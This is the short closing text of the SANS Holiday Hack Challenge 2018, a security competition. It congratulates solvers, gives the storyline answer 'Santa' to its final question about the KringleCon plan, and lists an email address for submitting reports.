You did such a GREAT job! And remember what happened to the people who suddenly got everything they ever wanted?
They lived happily ever after.


Question 14:
Who was the mastermind behind the whole KringleCon plan?
If you would like to submit a final report, please do so by emailing it to: SANSHolidayHackChallenge@counterhack.com

Answer: Santa

Congratulations on solving the SANS Holiday Hack Challenge 2018!